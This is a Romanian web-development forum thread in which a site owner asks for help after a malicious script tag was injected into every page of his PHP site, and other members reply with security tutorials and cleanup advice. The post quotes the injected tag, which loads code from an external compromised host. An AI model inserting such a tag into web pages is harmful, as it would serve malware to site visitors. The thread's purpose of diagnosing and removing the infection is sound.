vulnerabilitate in paginile unui site

Aici postaţi orice este legat de tehnologiile "client side". HTML, HTML5, XHTML, CSS, CSS3, XML, Standarde
Manual JS: http://www.phpromania.net/jsmanual/index.html

Moderatori: eyecon, Moderatori

Avatar utilizator
menace_forevermore
Average Member
Mesaje: 128
Membru din: Mar Aug 07, 2007 9:21 am
Localitate: Barlad

vulnerabilitate in paginile unui site

Mesajde menace_forevermore » Joi Mai 28, 2015 7:45 pm

va salut!

De ceva timp am o problema de securitate cu un site creat de mine. Anume in fiecare pagina din el incepand cu index.php mi se insereaza un cond malitios

Cod: Selectaţi tot

<!--3bc84d--><script type="text/javascript" src="http://dealerscollection.com.ar/wp-content/themes/twentythirteen/pxhctwfw.php?id=39527871"></script><!--/3bc84d-->


iar Google ma avertizeaza ca siteul e "potential harmful".

Cred ca este vorba de un atac XSS dar nu prea mai sunt in tema cu programarea web si problemele de securitate, si nu am timp sa ma documentez cum pot remedia, asa ca rog pe cineva care se pricepe sa-mi spuna ce anume trebuie modificat.

Atasez index.php cu tot cu codul injecatat. Multumesc anticipat!
Fişiere ataşate
index.rar
(1.89 KiB) Descărcat de 183 ori



Avatar utilizator
Birkoff
Senior Member
Mesaje: 6380
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Re: vulnerabilitate in paginile unui site

Mesajde Birkoff » Joi Mai 28, 2015 10:21 pm

iti ia cel mult 1 ora sa te documentezi, poti citi articolele de aici
tutoriale despre securitate
si cel mai bun din toate e tutorialul phpsec.org

si dupa ce te-ai lamurit unde ai lipsuri si probleme, le poti rezolva tu singur.
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

clickymedia
Junior Member
Mesaje: 45
Membru din: Mie Iun 17, 2015 2:11 pm
Contact:

Re: vulnerabilitate in paginile unui site

Mesajde clickymedia » Mie Sep 02, 2015 12:38 pm

Salut,

Am avut si eu ceva de genu si a fost de la un virus
Eu am cautat in toate paginile site-ului dupa codul inserat in plus si am dat replace cu un spatiu gol
Dupa am schimbat parola la ftp si gata
Recent am realizat un magazin online cu haine bebelusi ieftine si de calitate.


Înapoi la “HTML/JavaScript/CSS”

Cine este conectat

Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 42 vizitatori